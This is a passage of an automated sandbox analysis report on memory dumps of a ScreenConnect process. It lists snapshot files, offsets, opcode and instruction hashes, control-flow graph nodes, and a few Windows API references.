                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_5e30000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d5b205ce393e48fdb25b1230350686ea2842de66515c391b2de116655cdfe203
                                                                      • Instruction ID: aa2d629237f341d40731fac2b37b0d8b7005210a6aafc670afe3cf1d329ead73
                                                                      • Opcode Fuzzy Hash: d5b205ce393e48fdb25b1230350686ea2842de66515c391b2de116655cdfe203
                                                                      • Instruction Fuzzy Hash: 9751B271A002059FCB24CF69D8856AEFBF1FF88310F10892DD49AD7650D734E945CB91

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 498 5e36651-5e36652 499 5e36654-5e36658 498->499 500 5e36659-5e3665a 498->500 499->500 501 5e36661-5e3667b 500->501 502 5e3665c 500->502 503 5e36680-5e366f1 ProcessIdToSessionId 501->503 502->501 504 5e366f3-5e366f9 503->504 505 5e366fa-5e36722 503->505 504->505
                                                                      APIs
                                                                      • ProcessIdToSessionId.KERNEL32(00000000,?), ref: 05E366DE
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.3002019468.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_5e30000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID: ProcessSession
                                                                      • String ID:
                                                                      • API String ID: 3779259828-0
                                                                      • Opcode ID: d90f00c235765cb50e869dbd89c5107cedde2f7facd47374f4c1da21f7a56f86
                                                                      • Instruction ID: 587b20090f7b3f76cc0e0e35774bbd485a82775c34d84217e7a3ab6018ba4423
                                                                      • Opcode Fuzzy Hash: d90f00c235765cb50e869dbd89c5107cedde2f7facd47374f4c1da21f7a56f86
                                                                      • Instruction Fuzzy Hash: F32186B58043499FCB10CFAAC849ADEFBF4AB49314F1580AAD498A7251D3789548CFA1

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 575 5e356d4-5e365ce 577 5e365d0-5e365d8 575->577 578 5e365da-5e36610 K32EnumProcesses 575->578 577->578 579 5e36612-5e36618 578->579 580 5e36619-5e36641 578->580 579->580
                                                                      APIs
                                                                      • K32EnumProcesses.KERNEL32(00000000,00000000,?), ref: 05E365FD
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.3002019468.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_5e30000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID: EnumProcesses
                                                                      • String ID:
                                                                      • API String ID: 84517404-0
                                                                      • Opcode ID: 7df4e8122e717442a67c862e96d29c5cbf4cbeefee1a6dd8c7bb25b18b4127cb
                                                                      • Instruction ID: 9bf13728353900859fd3204baef08fb4b8154324471017102c62df305962e58a
                                                                      • Opcode Fuzzy Hash: 7df4e8122e717442a67c862e96d29c5cbf4cbeefee1a6dd8c7bb25b18b4127cb
                                                                      • Instruction Fuzzy Hash: 122159B59002199FDB10CF99C845ADEFBF4FB48314F10842DE558B7301C378A945CBA4

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 508 40e19c0-40e1a07 511 40e1a3a-40e1a3e 508->511 512 40e1a09-40e1a34 508->512 513 40e1a40-40e1a6b 511->513 514 40e1a71-40e1a75 511->514 512->511 513->514 515 40e1a8b-40e1a8f 514->515 516 40e1a77-40e1a85 514->516 518 40e1abb-40e1b4d 515->518 519 40e1a91-40e1ab5 515->519 516->515 525 40e1b4f-40e1b7c 518->525 526 40e1b82-40e1b86 518->526 519->518 525->526 527 40e1b88-40e1b9c 526->527 528 40e1ba2-40e1ba6 526->528 527->528 531 40e1ba8-40e1bbc 528->531 532 40e1bc2-40e1bc6 528->532 531->532 534 40e1bc8-40e1bdc 532->534 535 40e1be2-40e1be6 532->535 534->535 536 40e1bfc-40e1c00 535->536 537 40e1be8-40e1bf6 535->537 540 40e1c16-40e1c1a 536->540 541 40e1c02-40e1c10 536->541 537->536 542 40e1c1c-40e1c2a 540->542 543 40e1c30-40e1c34 540->543 541->540 542->543 544 40e1c4a-40e1c4e 543->544 545 40e1c36-40e1c44 543->545 546 40e1c50-40e1c7b 544->546 547 40e1c81-40e1c85 544->547 545->544 546->547 548 40e1c87-40e1c95 547->548 549 40e1cd1-40e1cd8 547->549 548->549 551 40e1c97 548->551 552 40e1c9a-40e1c9f 551->552 554 40e1cd9-40e1d59 552->554 555 40e1ca1-40e1cb2 552->555 567 40e1d9c-40e1d9d 554->567 568 40e1d5b-40e1d71 554->568 556 40e1cbd-40e1ccf 555->556 557 40e1cb4-40e1cb7 555->557 556->549 556->552 557->556 570 40e1da8-40e1dad 567->570 571 40e1d7a-40e1d9a 568->571 572 40e1d73 568->572 571->567 572->571
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: d
                                                                      • API String ID: 0-2564639436
                                                                      • Opcode ID: 3cfb0d6c6e24ff2132a595777a2cbf7fbf5492128075855bec79c9dc13e71815
                                                                      • Instruction ID: 327a2f6cc3343e57cd535ff101c51189a1abded0217a1b218c623df8a4e0ae0b
                                                                      • Opcode Fuzzy Hash: 3cfb0d6c6e24ff2132a595777a2cbf7fbf5492128075855bec79c9dc13e71815
                                                                      • Instruction Fuzzy Hash: F8D15A74A00615CFCB04DF69C894AA9B7F1FF89314B1186A9E909AF365DB30FC95CB80

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 601 5e356c8-5e366f1 ProcessIdToSessionId 603 5e366f3-5e366f9 601->603 604 5e366fa-5e36722 601->604 603->604
                                                                      APIs
                                                                      • ProcessIdToSessionId.KERNEL32(00000000,?), ref: 05E366DE
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.3002019468.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_5e30000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID: ProcessSession
                                                                      • String ID:
                                                                      • API String ID: 3779259828-0
                                                                      • Opcode ID: 09520a99a293f7b787c4f033ec33939b1f39bd127d9caaef1e349e0fdb3720ef
                                                                      • Instruction ID: fea92850b95cc032658391c650aec5f4ea6a3c05d1b0f4bf6d4b7319b55efde4
                                                                      • Opcode Fuzzy Hash: 09520a99a293f7b787c4f033ec33939b1f39bd127d9caaef1e349e0fdb3720ef
                                                                      • Instruction Fuzzy Hash: 661133B58002199FCB10CFAAC4497EEBBF4FB48324F108469D459A7210D378A944CFA5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: [!
                                                                      • API String ID: 0-4044816477
                                                                      • Opcode ID: 3b5cbea4e2eb4a20e6d1e96cf8677440783fc7e7c94f0760f6ad73ef954443cb
                                                                      • Instruction ID: 3a6c0f93701ce164af4b49e9a9a589055182b2f9706309c621a75d0909404fa8
                                                                      • Opcode Fuzzy Hash: 3b5cbea4e2eb4a20e6d1e96cf8677440783fc7e7c94f0760f6ad73ef954443cb
                                                                      • Instruction Fuzzy Hash: 95A18370A002019FDB15DF69D99099EBBF2FF84358B14C969D409AB364EF71FC5A8B80
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: LR^q
                                                                      • API String ID: 0-2625958711
                                                                      • Opcode ID: b7553c81598c4a9a48a91a0e969c03f1ef540f204b0bfd9516337531b2b02514
                                                                      • Instruction ID: 2699a935866d895a26c3d84caaa56eda07be59f7672ea20212c7f4439586ae87
                                                                      • Opcode Fuzzy Hash: b7553c81598c4a9a48a91a0e969c03f1ef540f204b0bfd9516337531b2b02514
                                                                      • Instruction Fuzzy Hash: E951C175A001169FDB18CB66C540ABEB7F6FF84308F15C5AED845EB351D630E852CB91
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: LR^q
                                                                      • API String ID: 0-2625958711
                                                                      • Opcode ID: 1808d17e87a609a0bac065e6ecf5e47f6028f378fb7c898c9ee242efc7fe74b6
                                                                      • Instruction ID: 81c600be74f08371d13018f27cf90795a01ceb716d6af4baa6e3d24f16f10e2b
                                                                      • Opcode Fuzzy Hash: 1808d17e87a609a0bac065e6ecf5e47f6028f378fb7c898c9ee242efc7fe74b6
                                                                      • Instruction Fuzzy Hash: 2D214F34F012099FDB28DB66E4587BE77BAEB88700F14846DE402AB394DF706D05CB86
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: LR^q
                                                                      • API String ID: 0-2625958711
                                                                      • Opcode ID: 03f378da15c3992bee119d6eb2fe72be2aef325801ff6718cd4b2149bc3cacf4
                                                                      • Instruction ID: 097ca1ddb44bbc0f6def917504a8b7354cc61061e5b0dcf33b70e0dcf8d07f17
                                                                      • Opcode Fuzzy Hash: 03f378da15c3992bee119d6eb2fe72be2aef325801ff6718cd4b2149bc3cacf4
                                                                      • Instruction Fuzzy Hash: 63215C34B012099FDB28DB66E5597AE77BAEB88701F10846DE402BB294DB706D06CB46
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 52759578cb6c671d9671e8483d6205b641c4c079fb9b8909458a420d6ddd3e7b
                                                                      • Instruction ID: d0241f4526172da30e585d39a7c51521d601cabc1f23f532491be6eb95ff9fa6
                                                                      • Opcode Fuzzy Hash: 52759578cb6c671d9671e8483d6205b641c4c079fb9b8909458a420d6ddd3e7b
                                                                      • Instruction Fuzzy Hash: 9E717C31B402068FDB04DFA9C89056EFBF2EFC4214B15856AE515FB369DA75FC028B81
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 24aab79cb522b53392dadc211dac9bdb8b571758eddeb37af657340db7f79bf9
                                                                      • Instruction ID: ddc2c9594bd4f31cec53b0134214ef18bcd73707a9402433147d9ee5d13def80
                                                                      • Opcode Fuzzy Hash: 24aab79cb522b53392dadc211dac9bdb8b571758eddeb37af657340db7f79bf9
                                                                      • Instruction Fuzzy Hash: 6C5129307006058FDB64DF6AD88496AF7F2FF89314B148629E596EB764E730F845CB90
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8fc1492eddc226f95e6dc172b56e5f7a2e17880ac8dc4ac7d5c6075896abaf45
                                                                      • Instruction ID: 6266e97de3e332a0cfd6eac4fec0472d84868454d93b8cdb833589100f59a595
                                                                      • Opcode Fuzzy Hash: 8fc1492eddc226f95e6dc172b56e5f7a2e17880ac8dc4ac7d5c6075896abaf45
                                                                      • Instruction Fuzzy Hash: E341C434610601CFDB74DF2AD854626B7F6BF99314B544A2CE496EB7A4EB31F806CB80
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 70adfa5d7498ad10111c4221423ba8de50848ba245c214c0e69fdd580beb140e
                                                                      • Instruction ID: ff1c55a61da68845b045ba685071a078e3bacefdb36899670233c7b0ff64b5b7
                                                                      • Opcode Fuzzy Hash: 70adfa5d7498ad10111c4221423ba8de50848ba245c214c0e69fdd580beb140e
                                                                      • Instruction Fuzzy Hash: E3411B71E002199FDB14DFA6C890AEEBBF6EF88704F148129E515BB340DB74B946CB91
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b05c3c6cac5778846ff078b0dbacbc0c77a03fd3cfc72e972d3af7c980e314c9
                                                                      • Instruction ID: be6620da86014ec64300ee3c19370cf28d68357ff3a5df037eff33dd0ab87577
                                                                      • Opcode Fuzzy Hash: b05c3c6cac5778846ff078b0dbacbc0c77a03fd3cfc72e972d3af7c980e314c9
                                                                      • Instruction Fuzzy Hash: 4641C3307402029FD705AABA99A423EB7E2FBC4254714C929D525EB3C4EFA4FC5A8791
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 48c23ccf8f7634b9375d6f83e6997d6e2e477958645a024f5149a4cce5b81a86
                                                                      • Instruction ID: 16e12efa72abedd1bfd0836aef966bf92f78a31e6e3a361e540882531ca0308b
                                                                      • Opcode Fuzzy Hash: 48c23ccf8f7634b9375d6f83e6997d6e2e477958645a024f5149a4cce5b81a86
                                                                      • Instruction Fuzzy Hash: A6416F307007018FD734CF29D884A2AB7F2BF89314B148A59E4969B7A5EB31F846CF40
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0cdd70df65842dc0f4d1aaa128da8247be16eb9fb99335f7cfb6bc0b45741540
                                                                      • Instruction ID: b2b8a5cd051c5fa531bf232f17d98434831183438edb317a386cf83c97736c99
                                                                      • Opcode Fuzzy Hash: 0cdd70df65842dc0f4d1aaa128da8247be16eb9fb99335f7cfb6bc0b45741540
                                                                      • Instruction Fuzzy Hash: 7B319E74B002168FDB14DBADC5949AEF7F6EF89254B10817AE409EB758EB34EC018BD1
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: bbe094927c55c1c95ca4d077e76129e1fac7bd4fd2b4d6562fda5bf2f24990a4
                                                                      • Instruction ID: 4c59fc49fabf69a113228ce30d1b9870fd8471611f5e26e32201c969c3a11656
                                                                      • Opcode Fuzzy Hash: bbe094927c55c1c95ca4d077e76129e1fac7bd4fd2b4d6562fda5bf2f24990a4
                                                                      • Instruction Fuzzy Hash: 294147747402028FCB14DF79D99496ABBF2FF8931071485A9E51ADB365EB30EC54CB80
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 372ecbc068ab52139e175eb2bfa32a2650be6dae21dc35a9c4ab730fc590438a
                                                                      • Instruction ID: 8bb115cf224b51bb6df1e6be1cb8ced42fe67716120125406bfd72f5051acea9
                                                                      • Opcode Fuzzy Hash: 372ecbc068ab52139e175eb2bfa32a2650be6dae21dc35a9c4ab730fc590438a
                                                                      • Instruction Fuzzy Hash: 3C3126347406028FCB14DF69D994D6ABBF2FF8931071486A8E41A9B365EB71FC54CB80
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 28655fe5d5f95933ec1f7cdf9cb3752feed23a8f61ff236e52e1f5d79b42bef9
                                                                      • Instruction ID: bcd0a91e4cba087b588321d05c8ceb195340f18b1a4c00ab2b2deecc82c1546b
                                                                      • Opcode Fuzzy Hash: 28655fe5d5f95933ec1f7cdf9cb3752feed23a8f61ff236e52e1f5d79b42bef9
                                                                      • Instruction Fuzzy Hash: D431D831600B018FC778DF6AD84866ABBF5FF85711B104B2CE466976E4EB70A948CB91
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 070b93868467fcfc61dc776cce2ea970a75e2bbc8f3ee4bdb4b662fc6982a769
                                                                      • Instruction ID: 5bacf7fa91759921f26e37f4378869606c7743d84a4a1c713184f6f4cfb7d41a
                                                                      • Opcode Fuzzy Hash: 070b93868467fcfc61dc776cce2ea970a75e2bbc8f3ee4bdb4b662fc6982a769
                                                                      • Instruction Fuzzy Hash: 3231D1B16083428FC7029B24D89199EBFB0FF46204B0585AAD494EF362E634E90ACB91
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a01077b683cdac66a865b414b7c63b9bb4918256bdd598f2ee63d3da39c24136
                                                                      • Instruction ID: b759c8d9725e7a2ce465f5269d787120eb878c2f20f697f9f09fc5f813170e34
                                                                      • Opcode Fuzzy Hash: a01077b683cdac66a865b414b7c63b9bb4918256bdd598f2ee63d3da39c24136
                                                                      • Instruction Fuzzy Hash: F6313C30A012059FEB14DFA5C594AADBBF1BF8D304F244499E406BB366DB31ED12CB55
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 71e84196b063efadcf20ee2545cdaf0d0fe84260568bf2e7899bdb62cc71fc41
                                                                      • Instruction ID: d998ae61d10e06616ac834fd61f07007e3b0d4920dc8a9aeb186e02959c07cee
                                                                      • Opcode Fuzzy Hash: 71e84196b063efadcf20ee2545cdaf0d0fe84260568bf2e7899bdb62cc71fc41
                                                                      • Instruction Fuzzy Hash: E4314931A002089FDB18DFA5C594AAEBBF5BF8D304F204099E506BB366DB31ED11CB94
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2956546852.000000000104D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0104D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_104d000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 256175bc165c59b593febf230fc247714f22e91e3f63079552a4ec5fb5d27ce3
                                                                      • Instruction ID: 5f7e15d034e42e47e88f5e45731d33913cf0b1fe866da2a21456e58a8dbe1897
                                                                      • Opcode Fuzzy Hash: 256175bc165c59b593febf230fc247714f22e91e3f63079552a4ec5fb5d27ce3
                                                                      • Instruction Fuzzy Hash: 6B2103B5504280DFDB06DF58D9C0B2ABFA5FBA8310F2085B9E9490B256C336D456CBA1
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7031d9f777fd857adfa35467906975369bf17efcf17eda8c938fdc93071744f5
                                                                      • Instruction ID: 2cba8a69259c5c7560479241b8d3bc2a34e002b1ef0d8ac878ea5a45f3e860bb
                                                                      • Opcode Fuzzy Hash: 7031d9f777fd857adfa35467906975369bf17efcf17eda8c938fdc93071744f5
                                                                      • Instruction Fuzzy Hash: 25214831A402198FDF14DBA8DA54AADBBF2BF89310F118469E505BB374DB79AC44CB90
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8d1469ba53341238f143d79c8eb91557b7c4d64389a10a5dcc92567721e3268a
                                                                      • Instruction ID: 2958b29931a69f24093690550142d0a064dab0b2c0723b2fdedeb7fc2a34abe0
                                                                      • Opcode Fuzzy Hash: 8d1469ba53341238f143d79c8eb91557b7c4d64389a10a5dcc92567721e3268a
                                                                      • Instruction Fuzzy Hash: BF2157B6900209DFCB10CF9AC844AEEBBF5FB48310F148429E964BB210C379A555CFA1
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5858855c0fc0559ae6ab2a59f6126deec191cb0c97974c000f684d12ba4e35b0
                                                                      • Instruction ID: a56e1e196b7c85b332793b4330c1033401bc16fbf509ddeb3d871b2fa8fc5e2c
                                                                      • Opcode Fuzzy Hash: 5858855c0fc0559ae6ab2a59f6126deec191cb0c97974c000f684d12ba4e35b0
                                                                      • Instruction Fuzzy Hash: 3A214930A402098FDF14DBA8DA54AADBBF6AF89310F154469E505BB374DB79EC40CB90
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 44fab05cc43e3b2572c327613a0dc578e96bfe05b870c93b3edb5666d2e8d7c1
                                                                      • Instruction ID: 42e7f491d5530f687d783f2cd4c9f32dd5b82cd02e192ed7ab6d5c92c42b1b1e
                                                                      • Opcode Fuzzy Hash: 44fab05cc43e3b2572c327613a0dc578e96bfe05b870c93b3edb5666d2e8d7c1
                                                                      • Instruction Fuzzy Hash: 1B2138B6800259DFCF10CF9AC844ADEBBF1FF48310F148429E968A7210C339A555CFA1
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ea4baf96b2b8f57eb1e790efe2feb49deb1d9cdcd4f8d1c57a374d8d09940888
                                                                      • Instruction ID: 48718253a818e3a8385c215d6e3849623768e9cf6c1d25c78b4a6fc33efe99ca
                                                                      • Opcode Fuzzy Hash: ea4baf96b2b8f57eb1e790efe2feb49deb1d9cdcd4f8d1c57a374d8d09940888
                                                                      • Instruction Fuzzy Hash: 07116070640201AFD314EB24D985A99F7A6FB84754F008638E5055B3A8CBB5FC498BD0
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9be6c80dc6614ea15d341d18d0a067117cc41289a385c404d185c84e483656da
                                                                      • Instruction ID: 2758679ead40c7ba3399751c2a8e78689cef3deb9ef0c662cfd81baa810acd8b
                                                                      • Opcode Fuzzy Hash: 9be6c80dc6614ea15d341d18d0a067117cc41289a385c404d185c84e483656da
                                                                      • Instruction Fuzzy Hash: 8A211A32D1070A9DCB00EFB9D8405EEF7B4EF99310F10C72AD559B6110FB70A2A58B91
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 044d81de299cbab22dbaded112a7ea9bfa767627813f5c98ac2b65e76528592f
                                                                      • Instruction ID: 4184aced5b81696a293288fb751d5cdc108823283740693cf1690ae2ac90b17f
                                                                      • Opcode Fuzzy Hash: 044d81de299cbab22dbaded112a7ea9bfa767627813f5c98ac2b65e76528592f
                                                                      • Instruction Fuzzy Hash: CD114C71600206DFDB10DF69D8819AEBBA5FF84314B408639E559AF324EB70ED058BD0
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 23471dd97626b2895dfbb28de2aeb5acbe8409d5030f06d4cca4415a40ca516a
                                                                      • Instruction ID: 1ccc4370cd2a8982953d054a7e926a613890c1521f809ca8809dfdfb9cd252a7
                                                                      • Opcode Fuzzy Hash: 23471dd97626b2895dfbb28de2aeb5acbe8409d5030f06d4cca4415a40ca516a
                                                                      • Instruction Fuzzy Hash: DD218E70E0020A9FDB04EFA5D5999AEBBB1FF88304B008564D915FB350CB70ED86CB51
                                                                      Memory Dump Source
